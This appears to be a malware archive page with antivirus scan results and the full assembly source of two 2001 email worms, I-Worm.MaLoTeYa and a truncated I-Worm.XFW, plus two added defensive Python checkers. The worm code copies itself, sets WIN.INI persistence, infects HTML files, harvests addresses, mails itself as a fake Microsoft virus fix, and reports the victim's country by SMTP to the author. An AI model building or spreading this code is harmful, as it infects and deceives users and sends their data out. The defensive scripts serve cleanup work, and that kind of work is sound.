PCTools 4.4.2.0 2009.05.15 I-Worm.Petgwb.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.b
Sophos 4.41.0 2009.05.16 W32/Bush
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.E
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Petgwb.A

Additional information
File size: 9216 bytes
MD5...: 1defedea5174374180d660693622fb90
SHA1..: f8047ed4d150dfd6ae9e8fd5cd6146c960570f1b
comment #
Name : I-Worm.MaLoTeYa
Author : PetiK
Date : July 2nd - July 6th
Size : 12288 bytes

Action: It copies itself to \WINDOWS\RUNW32.EXE and to \WINDOWS\SYSTEM\MSVA.EXE. It alters the run= line and creates the VARegistered.htm file in the StartUp folder. This file sends some information to petik@multimania.com and displays a fake message.
If the platform is Windows 95/98, the worm registers itself as a service process.
It infects all *.htm and *.html files by writing a VB script at their end. It then checks whether an internet connection exists and scans all *.htm* files in the "Temporary Internet Files" folder to find email addresses and send a copy of itself. The worm also sends an email to "petik@multimania.com" with the country of the user. When the user wants to see the system properties, the title of the window is changed to "PetiK always is with you :-)".

Greets to Benny, ZeMacroKiller98, Mandragore.

tasm32 /M /ML Maloteya
tlink32 -Tpe -aa -x Maloteya,,,import32
#

.586p
.model flat
.code

JUMPS

callx macro a
extrn a:proc
call a
endm

include useful.inc
;----------------------------------------
;Installation of the worm in the computer
;----------------------------------------
DEBUT:
VERIF: push 00h
callx GetModuleFileNameA
push 50h
push offset szOrig
push eax
callx GetModuleFileNameA

push 50h
push offset szCopie
callx GetWindowsDirectoryA
@pushsz "\RUNW32.EXE"
push offset szCopie
callx lstrcat
push 50h
push offset szCopb
callx GetSystemDirectoryA
@pushsz "\MSVA.EXE"
push offset szCopb
callx lstrcat

push offset szOrig
push offset szCopie
callx lstrcmp
test eax,eax
jz CACHE

COPIE: push 00h
push offset szCopie
push offset szOrig
callx CopyFileA
push 00h
push offset szCopb
push offset szOrig
callx CopyFileA

WININI: push 50
push offset szWinini
callx GetWindowsDirectoryA
@pushsz "\\WIN.INI"
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
@pushsz "run"
@pushsz "windows"
callx WritePrivateProfileStringA

;--------------------------------------------------
;Create VARegistered.htm file in the StartUp folder
;--------------------------------------------------
C_GET: @pushsz "SHELL32.dll"
callx LoadLibraryA
mov SHELLhdl,eax
@pushsz "SHGetSpecialFolderPathA"
push SHELLhdl
callx GetProcAddress
mov getfolder,eax
push 00h
push 07h ; STARTUP Folder
push offset StartUp
push 00h
call [getfolder]
test eax,eax
je F_HTM
@pushsz "\VARegistered.htm"
push offset StartUp
callx lstrcat

HTM: push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
push offset StartUp
callx CreateFileA
mov [FileHdl],eax
push 00h
push offset octets
push HTMTAILLE
push offset htmd
push [FileHdl]
callx WriteFile
push [FileHdl]
callx CloseHandle
F_HTM: push [SHELLhdl]
callx FreeLibrary
F_MESS: push 1000
callx Sleep
push 1040h
@pushsz "Microsoft Virus Alert"
@pushsz "Your system does not appear infected with I-Worm.Magistr"
push 00h
callx MessageBoxA
jmp FIN
;----------------------------------
;Service process for Windows 95/98
;----------------------------------
CACHE: @pushsz "KERMEL32.dll"
callx GetModuleHandleA
@pushsz "RegisterServiceProcess"
push eax
callx GetProcAddress
xchg ecx,eax
jecxz D_INF
push 01h
push 00h
call ecx

D_INF: push 50
push offset szCurrent
callx GetCurrentDirectoryA
push offset szCurrent
callx SetCurrentDirectoryA

;---------------------------------------------
;Infect all *.htm* files of the Windows folder
;---------------------------------------------
FFF: push offset Search
@pushsz "*.htm*" ; Search some *.htm* files...
callx FindFirstFileA
inc eax
je F_INF
dec eax
mov [htmlHdl],eax

i_file: call infect ; and infect them

push offset Search
push [htmlHdl]
callx FindNextFileA
test eax,eax
jne i_file
push [htmlHdl]
callx FindClose
F_INF:
;-----------------------
; Check if we are connected
;-----------------------
NET1: @pushsz "WININET.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov WNEThdl,eax
@pushsz "InternetGetConnectedState"
push WNEThdl
callx GetProcAddress
test eax,eax
jz FIN
mov netcheck,eax
jmp NET2
NET2: push 00h
push offset Temp
call [netcheck] ; Connect to Internet ??
dec eax
jnz NET2
FINNET: push [WNEThdl]
callx FreeLibrary

PAYS: push 50
push offset szSystemini
callx GetWindowsDirectoryA
@pushsz "\Win.ini"
push offset szSystemini
callx lstrcat
push offset szSystemini
push 20
push offset org_pays
push offset Default
@pushsz "sCountry"
@pushsz "intl"
callx GetPrivateProfileStringA

;------------------------------------------------------------------
; Send the name of the country to "petik@multimania.com" (perhaps bugs)
;------------------------------------------------------------------
SMTP: push offset WSA_Data ; Winsock
push 0101h ; ver 1.1 (W95+)
callx WSAStartup
or eax,eax
jnz INIT

@pushsz "obelisk.mpt.com.uk"
callx gethostbyname ; convert SMTP Name to an IP address
xchg ecx,eax
jecxz FREE_WIN ; Error ?
mov esi,[ecx+12] ; Fetch IP address
lodsd
push eax
pop [ServIP]

push 00h ; Create Socket
push 01h ; SOCK_STREAM
push 02h ; AF_INET
callx socket
mov work_socket,eax
inc eax
jz FREE_WIN
push 16 ; Size of connect structure
call @1 ; Connect structure
dw 2 ; Family
db 0, 25 ; Port number
ServIP dd 0 ; IP of server
db 8 dup(0) ; Unused
@1:
push [work_socket]
callx connect
inc eax
jz CLOSE_SOC
lea esi,Send_M
mov bl,6
Command_Loop: xor eax,eax

call @2 ; Time-out:
Time_Out: dd 5 ; Seconds
dd 0 ; Milliseconds
@2:
push eax ; Not used (Error)
push eax ; Not used (Writeability)
call @3
Socket_Set: dd 1 ; Socket count
work_socket dd 0 ; Socket
@3:
push eax ; Unused
callx select
dec eax
jnz CLOSE_SOC

push 00h
push 512 ; Received data from socket
push offset buf_recv
push [work_socket]
callx recv
xchg ecx,eax ; Connection closed ?
jecxz CLOSE_SOC
inc ecx ; Error ?
jz CLOSE_SOC
or ebx,ebx ; Received stuff was QUIT
jz CLOSE_SOC ; reply ? then close up.
mov al,'2' ; "OK" reply
cmp bl,2 ; Received stuff was the DATA
jne Check_Reply ; reply ?
inc eax
Check_Reply: scasb
je Wait_Ready
lea esi,Send_M + (5*4)
mov bl,1
Wait_Ready:
xor ecx,ecx
lea eax,Time_Out
push eax
push ecx ; not used (Error)
lea eax,Socket_Set
push eax ; Writeability
push ecx ; Not used (Readability)
push ecx ; Unused
callx select
dec eax ; Time-out ??
jnz CLOSE_SOC

cld
lodsd

movzx ecx,ax
shr eax,16
add eax,ebp

push ecx ; Send command and data to the socket
push 00h
push ecx ; Size of buffer
push eax ; Buffer
push [work_socket]
callx send
pop ecx
cmp eax,ecx
jne CLOSE_SOC
dec ebx
jns Command_Loop

CLOSE_SOC:
push [work_socket]
callx closesocket
FREE_WIN:
callx WSACleanup

INIT: @pushsz "MAPI32.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov MAPIhdl,eax
@pushsz "MAPISendMail"
push MAPIhdl
callx GetProcAddress
test eax,eax
jz FIN
mov sendmail,eax
D_GET: @pushsz "SHELL32.dll"
callx LoadLibraryA
mov SHELLhdl,eax
@pushsz "SHGetSpecialFolderPathA"
push SHELLhdl
callx GetProcAddress
mov getfolder,eax
push 00h
push 20h ; MSIE Cache Folder
push offset Cache
push 00h
call [getfolder]
push [SHELLhdl]
callx FreeLibrary
push offset Cache
callx SetCurrentDirectoryA

;-----------------------------------------------------------
; Search email addresses into the "Temporary Internet Files"
;-----------------------------------------------------------
FFF2: push offset Search
@pushsz "*.htm*"
callx FindFirstFileA
inc eax
je END_SPREAD
dec eax
mov [htmlHdl],eax

i_htm: call infect2
push offset Search
push [htmlHdl]
callx FindNextFileA
test eax,eax
jne i_file
push [htmlHdl]
callx FindClose

END_SPREAD:
push [MAPIhdl]
callx FreeLibrary
;---------------------------------------------------------------
; Changes the title of the System Properties window on Wednesday
;---------------------------------------------------------------
DATE: push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDayOfWeek],3
jne FIN
WIN1: @pushsz "Propriétés Systême"
push 00h
callx FindWindowA
test eax,eax
jz WIN2
jmp WIN3
WIN2: @pushsz "System Properties" ; Change title some windows
push 00h
callx FindWindowA
test eax,eax
jz WIN1
WIN3: mov edi,eax
@pushsz "PetiK always is with you :-)"
push edi
callx SetWindowTextA
jmp WIN1
FIN: push 00h
callx ExitProcess
infect: pushad
mov esi,offset Search.cFileName
push esi
callx GetFileAttributesA
cmp eax,1
je end_infect
push 00h
push 80h
push 03h
push 00h
push 01h
push 40000000h
push esi
callx CreateFileA
xchg eax,edi
inc edi
je end_infect
dec edi
push 02h ; FILE_END
push 00h
push [Dist]
push edi
callx SetFilePointer
push 00h
push offset octets
push HTMSIZE
push offset d_htm
push edi
callx WriteFile
push edi
callx CloseHandle
push 01h ; READONLY
push esi
callx SetFileAttributesA
end_infect: popad
ret

infect2:pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset Search.cFileName
inc eax
je END_SPREAD
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h ; PAGE_READONLY
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp

xor eax,eax
push eax
push eax
push eax
push 04h ; FILE_MAP_READ
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi

push 00h
push ebx
callx GetFileSize
xchg eax,ecx
jecxz F3

d_scan_mail:
call @melto
db 'mailto:'
@melto: pop edi
scn_mail:
pushad
push 07h
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop scn_mail

F3: push esi
callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
popad
ret
scan_mail:
xor edx,edx
add esi,7 ; size of the string "mailto:"
mov edi,offset m_addr
push edi
p_car: lodsb ; next character
cmp al,' ' ; space ??
je car_s
cmp al,'"' ; end character ??
je car_f
cmp al,'''' ; end character ??
je car_f
cmp al,'@' ; @ character ??
jne not_a
inc edx
not_a: stosb
jmp p_car ; jmp to nxt char
car_s: inc esi
jmp p_car
car_f: xor al,al
stosb
pop edi
test edx,edx ; exist @ ??
je d_scan_mail
call ENVOIE
jmp d_scan_mail
ENVOIE: xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIh]
call [sendmail]
ret

.data
namer db 50 dup (0)
szCopb db 50 dup (0)
szCopie db 50 dup (0)
szCurrent db 50 dup (0)
szOrig db 50 dup (0)
szSystemini db 50 dup (0)
szWinini db 50 dup (0)
Cache db 70 dup (0)
StartUp db 70 dup (0)
m_addr db 128 dup (?)
WSA_Data db 400 dup (0)
buf_recv db 512 dup (0)
Default db 0
FileHdl dd ?
octets dd ?
netcheck dd ?
sendmail dd ?
getfolder dd ?
htmlHdl dd ?
MAPIhdl dd ?
SHELLhdl dd ?
WNEThdl dd ?
RegHdl dd ?
Dist dd 0
Temp dd 0
MAPIh dd 0
WormName db "I-Worm.MaLoTeYa coded by PetiK (c)2001 (05/07)",00h
Origine db "Made In France",00h

Message dd ?
dd offset sujet
dd offset corps
dd ?
dd offset date
dd ?
dd 2 ; MAPI_RECEIPT_REQUESTED ??
dd offset MsgFrom
dd 1 ; MAPI_UNREAD ??
dd offset MsgTo
dd 1
dd offset AttachDesc

MsgFrom dd ?
dd ?
dd offset NameFrom
dd offset MailFrom
dd ?
dd ?

MsgTo dd ?
dd 1 ; MAIL_TO
dd offset NameTo
dd offset m_addr
dd ?
dd ?
AttachDesc dd ?
dd ?
dd ? ; character in text to be replaced by attachment
dd offset szCopb ; Full path name of attachment file
dd ?
dd ?

sujet db "New Virus Alert !!",00h
corps db "This is a fix against I-Worm.Magistr.",0dh,0ah
db "Run the attached file (MSVA.EXE) to detect, repair and "
db "protect you against this malicious worm.",00h
date db "2001/07/01 15:15",00h ; YYYY/MM//DD HH:MM
NameFrom db "Microsoft Virus Alert"
MailFrom db "virus_alert@microsoft.com",00h
NameTo db "Customer",00h

Send_M: dw fHELO-dHELO
dw fFROM-dFROM
dw fRCPT-dRCPT
dw fDATA-dDATA
dw fMAIL-dMAIL
dw fQUIT-dQUIT

dHELO db 'HELO obelisk.mpt.com.uk',0dh,0ah
fHELO:
dFROM db 'MAIL FROM:<maloteya@petik.com>',0dh,0ah
fFROM:
dRCPT db 'RCPT TO:<petik@multimania.com>',0dh,0ah
fRCPT:
dDATA db 'DATA',0dh,0ah
fDATA:
dMAIL: db 'From: "MaLoTeYa",<maloteya@petik.com>',0dh,0ah
db 'Subject: Long Live the Worm',0dh,0ah
db 'Pays d''origine : '
org_pays db 20 dup (0)
db '',0dh,0ah
db '.',0dh,0ah
fMAIL:
dQUIT db 'QUIT',0dh,0ah
fQUIT:

htmd: db "<html><head><title>Virus Alert Registration</title></head>",0dh,0ah
db "<SCRIPT LANGUAGE=""VBScript"">",0dh,0ah
db "Sub control",0dh,0ah
db "dim i",0dh,0ah
db "dim caract",0dh,0ah
db "formu.action=""""",0dh,0ah
db "If formu.mail.value="""" Then",0dh,0ah
db " MsgBox ""Forgotten EMail""",0dh,0ah
db " Else",0dh,0ah
db " For i= 1 to len(formu.mail.value)",0dh,0ah
db " caract=mid(formu.mail.value,i,1)",0dh,0ah
db " If caract=""@"" Then",0dh,0ah
db " Exit For",0dh,0ah
db " End If",0dh,0ah
db " Next",0dh,0ah
db " If caract=""@"" Then",0dh,0ah
db " formu.action=""mailto:petik@multimania.com""",0dh,0ah
db " Else",0dh,0ah
db " MsgBox ""Invalid EMail""",0dh,0ah
db " End If",0dh,0ah
db "End If",0dh,0ah
db "End Sub",0dh,0ah
db "</SCRIPT>",0dh,0ah
db "<body bgcolor=white text=black>",0dh,0ah
db "<p align=""center""><font size=""5"">Microsoft Virus Alert Registration</font></p>",0dh,0ah
db "<p align=""left""><font size=""3"">Please fill out this form. </font>",0dh,0ah
db "<font>You must be connected to internet.</font></p>",0dh,0ah
db "<p></p>",0dh,0ah
db "<form name=""formu"" action method=""POST"" enctype=""text/plan"">",0dh,0ah
db "<p>Name : <input name=""nom"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>Firstname : <input name=""prenom"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>City : <input name=""ville"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>Country : <input name=""pays"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>E-Mail : <input name=""mail"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p><input type=""submit"" value=""Submit"" name=""B1"" onclick=""control""></p>",0dh,0ah
db "<p></p>",0dh,0ah
db "<p align=""center""><font><B>AFTER REGISTRATION YOU CAN DELETE THIS FILE</B></font></p>",0dh,0ah
db "</form></body></html>",00h
HTMTAILLE equ $-htmd
d_htm: db "",0dh,0ah,0dh,0ah
db "<SCRIPT Language=VBScript>",0dh,0ah
db "On Error Resume Next",0dh,0ah
db "Set fso=CreateObject(""Scripting.FileSystemObject"")",0dh,0ah
db "Set ws=CreateObject(""WScript.Shell"")",0dh,0ah
db "ws.RegWrite ""HKCU\Software\Microsoft\Internet Explorer\Main\Start Page"",""http://www.petikvx.fr.fm""",0dh,0ah
db "document.Write ""<font face='verdana' color=red size='2'>This file is infected by my new virus"
db "<br>Written by PetiK (c)2001"
db "<br>HTML/W32.MaLoTeYa.Worm<br></font>""",0dh,0ah
db "</SCRIPT>",0dh,0ah
HTMSIZE equ $-d_htm

OSVERSIONINFO struct
dwOSVersionInfoSize dd ?
dwMajorVersion dd ?
dwMinorVersion dd ?
dwBuildNumber dd ?
dwPlatformId dd ?
szCSDVersion db 128 dup (?)
OSVERSIONINFO ends

SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends

MAX_PATH equ 260

FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends

WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends

OSVer OSVERSIONINFO <>
SystemTime SYSTIME <>
Search WIN32_FIND_DATA <>

end DEBUT
end
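The WIN.INI persistence above is the same WritePrivateProfileStringA("windows", "run", ...) call in I-Worm.Bush (WININI:), I-Worm.MaLoTeYa (WININI:) and I-Worm.XFW (W_INI:, further down); the check below is an added example, not from the archive, that parses a WIN.INI and reports what that line would start. The sample file is constructed, the load= companion line goes beyond what the page mentions, and splitting the value on spaces and commas is an assumption of this example.

```python
"""Check a WIN.INI for the [windows] run= persistence used by the worms above.

Added example, not from the archive. WIN.INI is not a strict INI file, so the
parser is deliberately tolerant: blank lines, ';' comments, empty sections and
keys without values are all accepted. The load= line is handled as well
because it is the companion of run= (an addition of this example). Splitting a
value on spaces and commas is an assumption made here.
"""
import re

# File names the worms above drop and register, taken from their descriptions.
# services.exe is also a legitimate Windows NT binary, so a name match is only
# a lead to verify, not a verdict.
KNOWN_DROPS = {"bios.exe", "bush.exe", "runw32.exe", "msva.exe", "services.exe"}


def parse_win_ini(text):
    """Return {section: {key: value}} with section and key names lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def startup_entries(text):
    """Programs named on the [windows] run= and load= lines, as (key, program)."""
    windows = parse_win_ini(text).get("windows", {})
    found = []
    for key in ("run", "load"):
        for program in re.split(r"[ ,]+", windows.get(key, "")):
            if program:
                found.append((key, program))
    return found


def suspicious_entries(text):
    """Every entry is worth a look (a populated run= line is uncommon); entries
    matching a known drop name are called out explicitly."""
    findings = []
    for key, program in startup_entries(text):
        name = program.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        reason = ("known worm drop name" if name in KNOWN_DROPS
                  else f"non-empty {key}= line")
        findings.append((key, program, reason))
    return findings


# Constructed sample: a WIN.INI after I-Worm.MaLoTeYa has run (path as in its
# code), with the surrounding sections a real file carries.
SAMPLE_INFECTED = """; for 16-bit app support
[fonts]
[extensions]
[windows]
load=
run=C:\\WINDOWS\\RUNW32.EXE
NullPort=None
[intl]
sCountry=France
"""
# Constructed sample with two programs on one line: the I-Worm.Bush drop and
# an unrelated program, to show that both are reported with different reasons.
SAMPLE_TWO = "[windows]\nrun=C:\\WINDOWS\\SYSTEM\\BIOS.EXE notepad.exe\n"
SAMPLE_CLEAN = "[windows]\nload=\nrun=\n[intl]\nsCountry=France\n"

if __name__ == "__main__":
    for key, program, reason in suspicious_entries(SAMPLE_INFECTED):
        print(f"{key}= {program}: {reason}")
```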
File Maloteya.exe received on 05.16.2009 17:52:03 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.12288
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.4
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!8c02
Avast 4.8.1335.0 2009.05.15 Win32:Petik-Maloteya
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.D
BitDefender 7.2 2009.05.16 Win32.Matoleya.A@mm
CAT-QuickHeal 10.00 2009.05.15 W32.Petik
ClamAV 0.94.1 2009.05.16 Worm.Petik-1
Comodo 1157 2009.05.08 Worm.Win32.Petik.F
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.12288
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.12288
F-Prot 4.4.4.56 2009.05.16 W32/Malware!8c02
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Sabak.A!worm.im
GData 19 2009.05.16 Win32.Matoleya.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.4
Microsoft 1.4602 2009.05.16 Worm:Win32/Pet_tik.E@mm
NOD32 4080 2009.05.15 Win32/Petik.F
Norman 6.01.05 2009.05.16 W32/Pet_Tick.12288.A
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.F
PCTools 4.4.2.0 2009.05.16 VBS.Petik.F
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.q
Sophos 4.41.0 2009.05.16 W32/Petik-E
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.G
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.12288
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.12288
VirusBuster 4.6.5.0 2009.05.16 VBS.Petik.F

Additional information
File size: 12288 bytes
MD5...: eb7bea183626119bc54c4ab1de80c606
SHA1..: 1f022ad7156e8d510168b7ba441afeb966edb828
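Cleaner for the block that I-Worm.MaLoTeYa's infect routine appends to *.htm* files (the d_htm data above); an added example, not from the archive, with a constructed host page and a copy of the appended block reduced to a few of its lines.

```python
"""Strip the VBScript block that I-Worm.MaLoTeYa appends to *.htm* files.

Added example, not from the archive. infect() above seeks to the end of the
file, writes d_htm there and then sets the file read-only. It only skips a
file whose attributes are exactly FILE_ATTRIBUTE_READONLY (cmp eax,1), so a
file with other attribute bits set (archive, for instance) can be infected
again and end up carrying several appended blocks. The cleaner therefore
strips from the end repeatedly and stops when the tail no longer matches.
"""
BLOCK_OPEN = b"<SCRIPT Language=VBScript>\r\n"
BLOCK_CLOSE = b"</SCRIPT>\r\n"
MARKER = b"HTML/W32.MaLoTeYa.Worm"   # text of the document.Write line in d_htm
LEAD = b"\r\n\r\n"                   # d_htm begins with an empty line pair


def strip_one(data):
    """Return data without its last appended block, or None if none is there."""
    if not data.endswith(BLOCK_CLOSE):
        return None
    start = data.rfind(BLOCK_OPEN)
    if start < 0:
        return None
    block = data[start:]
    # Treat it as the worm's block only when its marker text is inside and the
    # block is the last thing in the file (exactly one closing tag after it).
    if MARKER not in block or block.count(BLOCK_CLOSE) != 1:
        return None
    if start >= len(LEAD) and data[start - len(LEAD):start] == LEAD:
        start -= len(LEAD)
    return data[:start]


def clean_html(data):
    """Strip all stacked blocks; return (cleaned bytes, number removed)."""
    removed = 0
    while True:
        stripped = strip_one(data)
        if stripped is None:
            return data, removed
        data, removed = stripped, removed + 1


# Constructed sample of the appended block, built from a few of the d_htm
# lines above so the test is self-contained.
APPENDED = (LEAD + BLOCK_OPEN
            + b"On Error Resume Next\r\n"
            + b'Set fso=CreateObject("Scripting.FileSystemObject")\r\n'
            + b'document.Write "<font>This file is infected by my new virus'
            + b"<br>HTML/W32.MaLoTeYa.Worm<br></font>\"\r\n"
            + BLOCK_CLOSE)
HOST = b"<html><body><p>hello</p></body></html>\r\n"
# A page that legitimately ends with a VBScript block must be left alone.
LEGIT = HOST + b"<SCRIPT Language=VBScript>\r\nMsgBox 1\r\n</SCRIPT>\r\n"

if __name__ == "__main__":
    cleaned, n = clean_html(HOST + APPENDED + APPENDED)
    print(n, cleaned == HOST)
```

Before writing the cleaned bytes back, clear the read-only attribute that infect() set on the file.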
comment #
Name : I-Worm.XFW (Extra French Worm)
Author : PetiK
Date : July 10th - August 3rd
Size : 5632 bytes (compressed with UPX)

Action: It copies itself to \SYSTEM\Services.exe. It adds a value in the run services key :
"Run Services"="\SYSTEM\Services.exe". It alters the "run=" line in the WIN.INI file.
It copies the file WSOCK32.DLL to WSOCK32.PTK and alters the original file by adding "PetiK" to it. It displays a message and creates \WINDOWS\Tool_PetiK.txt. This file explains how to repair WSOCK32.DLL.
If the worm is located in the \SYSTEM folder, it searches all DLL files in the current folder (SYSTEM here) and copies itself under each name with the ".EXE" extension added:
FILE.DLL ==>> FILE.DLL.EXE
Finally, if the computer is connected, it creates a VBS file to spread with Outlook.
To delete : del \WINDOWS\SYSTEM\Wsock32.dll
ren \WINDOWS\SYSTEM\Wsock32.ptk \WINDOWS\SYSTEM\Wsock32.dll
del \WINDOWS\SYSTEM\Services.exe
del \WINDOWS\SYSTEM\*.dll.exe
del \WINDOWS\Tool_PetiK.txt
remove the entry after run= in the WIN.INI file
del C:\.vbs

tasm32 /M /ML XFW.asm
tlink32 -Tpe -aa -x XFW.obj,,,import32
upx -9 XFW.exe

.586p
.model flat
.code

;JUMPS

callx macro a
extrn a:proc
call a
endm

include useful.inc

DEBUT: jmp INET


VERIF: push 00h
callx GetModuleHandleA
push 50h
push offset szOrig
push eax
callx GetModuleFileNameA
push 50h
push offset szCopie
callx GetSystemDirectoryA
@pushsz "\SERVICES.EXE"
push offset szCopie
callx lstrcat

push offset szOrig


push offset szCopie
callx lstrcmp
test eax,eax
jz INF_DLL

COPIE: push 00h


push offset szCopie
push offset szOrig
callx CopyFileA ; copy to \SYSTEM\Services.exe
W_INI: push 50
push offset Winini
callx GetWindowsDirectoryA
@pushsz "\\WIN.INI"
push offset Winini
callx lstrcat
push offset Winini
push offset szCopie
@pushsz "run"
@pushsz "windows"
callx WritePrivateProfileStringA
WSOCK: push 50
mov edi,offset a_wsck
push edi
callx GetSystemDirectoryA
test eax,eax
jz FIN
add edi,eax
mov eax,"OSW\"
stosd
mov eax,"23KC"
stosd
mov eax,"LLD."
stosd
xor eax,eax
stosd ; serach \SYSTEM\Wsock32.dll

push offset a_wsck


push offset n_wsck
callx lstrcat
mov esi,offset n_wsck
push esi
callx lstrlen
add esi,eax
sub esi,4 ; to become \SYSTEM\Wsock32
mov [esi],"KTP." ; and \SYSTEM\Wsock32.ptk

push 01h
push offset n_wsck
push offset a_wsck
callx CopyFileA
test eax,eax
jz FIN

xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset a_wsck
callx CreateFileA
inc eax
jz FIN
dec eax
mov WsckHdl,eax

xor eax,eax
push eax
push eax
push eax
push 04h ; PAGE_READWRITE
push eax
push WsckHdl
callx CreateFileMappingA
test eax,eax
jz FIN2
mov WsckMap,eax

xor eax,eax
push eax
push eax
push eax
push 06h ; SECTION_MAP_WRITE or READ
push WsckMap
callx MapViewOfFile
test eax,eax
jz FIN3
mov WsckView,eax

mov esi,eax
cmp byte ptr [esi+12h],"P"
je FIN3
mov word ptr [esi+12h],"eP"
mov word ptr [esi+14h],"it"
mov byte ptr [esi+16h],"K"

FIN4: push WsckView


callx UnmapViewOfFile
FIN3: push WsckMap
callx CloseHandle
FIN2: push WsckHdl
callx CloseHandle

F_MESS: push 10h


@pushsz "Loader Error"
@pushsz "This program will be terminated"
push 00h
callx MessageBoxA
TOOLS: pushad
push 50
push offset windir
callx GetWindowsDirectoryA
@pushsz "\Tool_PetiK.txt"
push offset windir
callx lstrcat
push 00h
push 01h or 20h
push 02h
push 00h
push 01h
push 40000000h
push offset windir
callx CreateFileA
mov edi,eax
push 00h
push offset octets
push TXTSIZE
push offset txtd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
jmp FIN

INF_DLL:
D_INF: push 50
push offset szCurFolder
callx GetCurrentDirectoryA
push offset szCurFolder
callx SetCurrentDirectoryA
FFF: push offset Search
@pushsz "*.dll"
callx FindFirstFileA ; search all DLL files
inc eax
je F_INF
dec eax
mov [htmlHdl],eax
i_file: pushad
mov edi,offset Search.cFileName
push edi
callx lstrlen
add edi,eax
mov eax,"EXE." ; and add .EXE => file.dll.exe
stosd
xor eax,eax
stosd
push 01h
push offset Search.cFileName
push offset szOrig
callx CopyFileA ; and copies with the main worm
test eax,eax
jz S_P
push offset Search
push [htmlHdl]
callx FindNextFileA
test eax,eax
jne i_file
FC: push [htmlHdl]
callx FindClose
popad
F_INF:

S_P: push offset RegHandle


push 01h
push 00h
@pushsz "Software\Microsoft\Internet Explorer\Main"
push 80000001h
callx RegOpenKeyExA
test eax,eax
jnz FIN
push offset PageSize
push offset Page
push offset ValueType
push 00h
@pushsz "Start Page"
push RegHandle
callx RegQueryValueExA
push [RegHandle]
callx RegCloseKey

@pushsz "http://www.whitesonly.net"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.kkk.com"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.front-national.fr"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.lepen-tv.com"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.hammerskins.com"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
jmp INET

FORMAT: pushad
push 00h
